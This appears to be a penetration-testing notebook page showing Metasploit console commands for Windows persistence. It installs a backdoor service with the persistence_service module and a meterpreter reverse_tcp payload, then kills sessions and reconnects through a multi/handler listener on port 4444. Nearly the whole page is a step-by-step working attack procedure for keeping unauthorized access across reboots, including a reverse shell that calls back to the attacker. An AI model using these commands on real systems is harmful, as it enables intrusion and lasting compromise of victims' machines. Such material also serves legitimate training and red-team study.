persistence_service msf module

Persistence

❗ In order to set up persistence, administrative privileges are required.

background
search platform:windows persistence
use exploit/windows/local/persistence_service
info
# Description:
#   This Module will generate and upload an executable to a remote host, 
#   next will make it a persistent service. It will create a new service 
#   which will start the payload whenever the service is running. Admin 
#   or system privilege is required.
set payload windows/meterpreter/reverse_tcp
set SESSION 1
run

  • Successful maintained access. Once the persistent backdoor is installed, it's going to continue to run (across restarts) as a service and a multi handler listening to a connection will receive a connection from the service.

Metasploit - exploit/windows/local/persistence_service
exit

# Kill all sessions
sessions -K
sessions
	# No active sessions.

  • Regain access to the system

use multi/handler
options
# Set the options as specified for the PERSISTENCE_SERVICE Exploit
set payload windows/meterpreter/reverse_tcp
set LHOST eth1
set LPORT 4444
run
PreviousWindows PersistenceNextEnabling RDP(msf,admin password change)

Last updated